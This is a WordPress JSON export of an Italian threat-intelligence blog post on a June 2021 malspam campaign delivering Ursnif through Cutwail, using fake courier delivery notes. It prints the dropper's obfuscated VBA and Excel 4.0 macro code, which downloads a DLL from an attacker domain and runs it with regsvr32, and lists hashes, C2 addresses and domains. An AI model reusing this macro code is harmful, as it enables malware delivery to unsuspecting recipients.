{"id":2545,"date":"2021-06-04T12:17:53","date_gmt":"2021-06-04T10:17:53","guid":{"rendered":"https:\/\/fortgale.com\/news\/?p=2545"},"modified":"2023-05-10T10:52:32","modified_gmt":"2023-05-10T10:52:32","slug":"ursnif-cutwail-giugno","status":"publish","type":"post","link":"https:\/\/fortgale.com\/blog\/uncategorized-it\/ursnif-cutwail-giugno\/","title":{"rendered":"Malware Ursinf\/Cutwail – Giugno 2021"},"content":{"rendered":"\n

Nuova campagna di Malspam<\/em> contenente malware Ursnif<\/strong>. Il malware in allegato, risulta essere una falsa bolla di consegna del corriere Bartolini<\/strong>.<\/p>\n\n\n

\n
\"\"
Mail che veicola il Malware<\/em><\/figcaption><\/figure>\n<\/div>\n\n\n

L’allegato malevolo risulta appartenere alla botnet Cutwail<\/strong> v2<\/strong>, gestita dal Threat Actor <\/em>NARWHAL SPIDER (info<\/a>)<\/strong>.
Cutwail v2 \u00e8 conosciuta anche come 0bulk Psych Evolution R4<\/strong>.
Cutwail ha origine nel 2007 ed \u00e8 cresciuta tramite Pushdo<\/strong>, un malware che ha infettato moltissimi sistemi Windows incorporandole all’interno della botnet.
Fino al 2020, Cutwail v2 ha distribuito principalmente malware, tra cui Dridex e Gozi, oltre a truffe di phishing nel tentativo di rubare le credenziali delgi utenti.<\/p>\n\n\n\n

File xlsm<\/h2>\n\n\n\n

L’allegato della mail contiene un file<\/em> xlsm<\/strong> (dropper<\/em><\/strong>).<\/p>\n\n\n\n

\"\"<\/figure>\n\n\n\n

Dettagli Macro<\/h3>\n\n\n\n

Macro contenute nell’allegato della mail:<\/p>\n\n\n\n

Type: OpenXML\n-------------------------------------------------------------------------------\nVBA MACRO Questa_cartella_di_lavoro.cls \nin file: xl\/vbaProject.bin - OLE stream: 'VBA\/Questa_cartella_di_lavoro'\n- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - \nFunction testo_uno()\n\nFor Each di In Sheets(3).UsedRange.SpecialCells(xlCellTypeConstants): Pk = \"-\"\nHi = Split(di, Pk)\nFor Each X In Hi\nnnv = nnv & Sheets(msoTabStopCenter).Range(X)\nNext\nNext\ntesto_uno = nnv\nEnd Function\n\nFunction minusole(uu As String, ik As Integer)\nSheets(1).Cells(ik, 1).FormulaLocal = uu\nEnd Function\n\nSub rempofo()\nmII = 0: COsT = 0: Run (\"casuale\")\nEnd Sub\n\nFunction revisio()\nSheets(1).Cells(6, 1).FormulaLocal = pago_i & nuove_d\nEnd Function\n\nFunction nuove_d()\nnuove_d = \"T\" & vnumeros & \"O\" & \"()\"\nEnd Function\n\nFunction fare_E() As String\nfare_E = \"\" & \"Y\"\nEnd Function\n\nFunction pago_i()\npago_i = Guida_1 & \"R\" & \"I\"\nEnd Function\n\nFunction v_promo() As Variant\nv_promo = Split(testo_uno, \"\" & fare_E)\nEnd Function\n\nFunction coSa() As String\ncoSa = \"O\"\nEnd Function\n\nFunction pagina_P()\npagina_P = revisio\nEnd Function\n\nSub Visualizzazioni()\nExcel4MacroSheets.Add Before:=Worksheets(1): ActiveSheet.Visible = xlSheetHidden\nriservata = pagina_P: Sheets(1).Cells(2, 1).Name = \"casuale\"\nFor Each xt In v_promo\ndalla_legge = minusole(Guida_1 & xt, 2): rempofo\nNext\nEnd Sub\n\nFunction Guida_1()\nGuida_1 = \"=\"\nEnd Function\n\nFunction bertranno()\nbertranno = \"\" & \"_i\"\nEnd Function\n\nFunction vnumeros() As String\nvnumeros = coSa & \"RN\"\nEnd Function\n-------------------------------------------------------------------------------\n+----------+--------------------+---------------------------------------------+\n|Type      |Keyword             |Description                                  |\n+----------+--------------------+---------------------------------------------+\n|Suspicious|Run                 |May run an executable file or a system       |\n|          |                    |command                                      |\n|Suspicious|Hex Strings         |Hex-encoded strings were detected, may be    |\n|          |                    |used to obfuscate strings                    |\n|Hex String|'\\x00\\x02\\x08\\x19'  |00020819                                     |\n|Hex String|'\\x00\\x00\\x00\\x00\\x0|000000000046                                 |\n|          |0F'                 |                                             |\n|Hex String|'\\x00\\x02\\x08 '     |00020820                                     |\n+----------+--------------------+---------------------------------------------+\n<\/code><\/pre>\n\n\n\n
NOME.RIF(\"KK\";\"er\")\nNOME.RIF(\"D\";\"\\\")\nNOME.RIF(\"m\";ARCCOS(-0,5)*135\/PI.GRECO())\nNOME.RIF(\"p\";COS(RADIANTI(60))-COS(60*PI.GRECO()\/180))\nNOME.RIF(\"K\";\"w\")\nNOME.RIF(\"Z\";\"o\")\nSE(VAL.NUMERO(RICERCA(K;INFO.AREA.DI.LAVORO(1))); ;CHIUDE(VERO))\nNOME.RIF(\"A\";\"C:\"&D&CODICE.CARATT(CASUALE.TRA(65;m))&CODICE.CARATT(CASUALE.TRA(65;m))&CASUALE.TRA(100;999)&CODICE.CARATT(CASUALE.TRA(65;m)))\nNOME.RIF(\"if\";CODICE.CARATT(115))\nNOME.RIF(\"B\";A&D&CODICE.CARATT(CASUALE.TRA(65;m))&CODICE.CARATT(CASUALE.TRA(65;m))&CASUALE.TRA(100;999)&CODICE.CARATT(CASUALE.TRA(65;m)))\nNOME.RIF(\"F\";INFO.AREA.DI.LAVORO(13)&\".\")\nNOME.RIF(\"U\";\"e\")\nRICHIAMA(\"K\"&U&\"rn\"&U&\"l32\";\"Cr\"&U&\"at\"&U&\"Direct\"&Z&\"ryA\";\"JCJ\";A;p)\nNOME.RIF(\"G\";NOME.RIF(\"h\";\"i\"))\nRICHIAMA(\"K\"&KK&\"n\"&U&\"l32\";\"CreateDir\"&U&\"ct\"&Z&\"ryA\";\"JCJ\";B;p)\nNOME.RIF(\"S\";\"t\")\nRICHIAMA(\"URLMON\";\"URLD\"&Z&\"wnl\"&Z&\"adT\"&Z&\"FileA\"; \"JJCCJJ\";p;RIMPIAZZA(\"hqps:\"&INFO.AREA.DI.LAVORO(9)&INFO.AREA.DI.LAVORO(9)&\"c\"&Z&\"nsul\"&S&\"a\"&S&\"y\"&Z&\"n\"&DESTRA(F)&\"c\"&Z&\"m\";2;1;S&S);B&D&F;p;p\n)\nATTESA(ADESSO()+\"00:00:09\")\nRICHIAMA(\"Sh\"&U&\"ll32\";\"Sh\"&U&\"llEx\"&U&\"cut\"&U&\"A\"; \"JJCCCCJ\";p;\"Op\"&U&\"n\";\"r\"&U&\"gsvr32\";\" -\"&if&\" \"&B&D&F;p;p)\nFILE.CHIUDI(FALSO)<\/code><\/pre>\n\n\n\n
La macro, contenuta nel documento, avvia una connessione verso il dominio consultatyon[.]com<\/strong> per scaricare il file dll<\/strong> contenente lo stadio successivo di Ursnif<\/strong>.<\/p>\n\n\n\n
\"\"
Dominio contattato per il download della dll<\/em><\/figcaption><\/figure>\n\n\n\n
DLL<\/h2>\n\n\n\n
    \n
  •  md5 <\/strong>3896AEE936D55D53EFA5E0D1C2AB817D<\/li>\n\n\n\n
  •  sha1 <\/strong>589E3E955C870821277C7F2EA9F60BC37BBB7825<\/li>\n\n\n\n
  •  sha256 <\/strong>E53CAA0529020312A9092B409C2A38D6DDF0C3D2786832A514657CA617DF770F<\/li>\n\n\n\n
  •  first-bytes-hex<\/strong> 4D 5A 90 00 03 00 00 00 04 00 00 00 FF FF 00 00 B8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 <\/li>\n\n\n\n
  •  imphash <\/strong>33440A0287E1F3D8BFD56DD3109F1807<\/li>\n\n\n\n
  •  cpu <\/strong>32-bit<\/li>\n<\/ul>\n\n\n\n
    Exports<\/h5>\n\n\n\n
      \n
    • Gasalways <\/strong>text:01019E40<\/li>\n\n\n\n
    • Pitchnecessary <\/strong>text:0101A79B<\/li>\n<\/ul>\n\n\n\n
      Dall’analisi della dll <\/em>\u00e8 possibile identificare i domini utilizzati per il download del successivo stadio.<\/p>\n\n\n\n
      \"Immagine\"\/
      Indirizzi e domini del Malware<\/figcaption><\/figure>\n\n\n\n
      Nell’ultimo stadio \u00e8 possibile identificare gli IP e i domini dei server di comando e controllo (C2<\/strong>)<\/p>\n\n\n\n
      \"Immagine\"\/
      Indirzzi C2<\/figcaption><\/figure>\n\n\n\n
      IOC<\/h2>\n\n\n\n
      DLL <\/strong><\/p>\n\n\n\n
        \n
      • sha256 <\/strong>E53CAA0529020312A9092B409C2A38D6DDF0C3D2786832A514657CA617DF770F <\/li>\n<\/ul>\n\n\n\n
        Domini e IP <\/h5>\n\n\n\n
        Dll<\/strong>:<\/p>\n\n\n\n
          \n
        • consultatyon[.]com<\/li>\n<\/ul>\n\n\n\n
          Loader<\/strong>: <\/p>\n\n\n\n
            \n
          • roudinoden[.]club <\/li>\n\n\n\n
          • cloudinoren[.]club<\/li>\n<\/ul>\n\n\n\n
             C2<\/strong>: <\/p>\n\n\n\n
              \n
            • 46.21.153[.]208 <\/li>\n\n\n\n
            • 46.21.153[.]209 <\/li>\n\n\n\n
            • 46.21.153[.]212 <\/li>\n\n\n\n
            • goudinoden[.]club <\/li>\n\n\n\n
            • woudinoden[.]club <\/li>\n\n\n\n
            • poudinoden[.]club <\/li>\n<\/ul>\n","protected":false},"excerpt":{"rendered":"
              File xlsm Dettagli Macro Macro contenute nell’allegato della mail: DLL Exports Dall’analisi della dll \u00e8 possibile identificare i domini utilizzati per il download del successivo stadio. IOC DLL Domini e IP Dll: Loader: C2:<\/p>\n","protected":false},"author":1,"featured_media":2573,"comment_status":"closed","ping_status":"closed","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[954],"tags":[],"class_list":["post-2545","post","type-post","status-publish","format-standard","has-post-thumbnail","hentry","category-uncategorized-it"],"_links":{"self":[{"href":"https:\/\/fortgale.com\/blog\/wp-json\/wp\/v2\/posts\/2545","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/fortgale.com\/blog\/wp-json\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/fortgale.com\/blog\/wp-json\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/fortgale.com\/blog\/wp-json\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"https:\/\/fortgale.com\/blog\/wp-json\/wp\/v2\/comments?post=2545"}],"version-history":[{"count":1,"href":"https:\/\/fortgale.com\/blog\/wp-json\/wp\/v2\/posts\/2545\/revisions"}],"predecessor-version":[{"id":5209,"href":"https:\/\/fortgale.com\/blog\/wp-json\/wp\/v2\/posts\/2545\/revisions\/5209"}],"wp:featuredmedia":[{"embeddable":true,"href":"https:\/\/fortgale.com\/blog\/wp-json\/"}],"wp:attachment":[{"href":"https:\/\/fortgale.com\/blog\/wp-json\/wp\/v2\/media?parent=2545"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/fortgale.com\/blog\/wp-json\/wp\/v2\/categories?post=2545"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/fortgale.com\/blog\/wp-json\/wp\/v2\/tags?post=2545"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}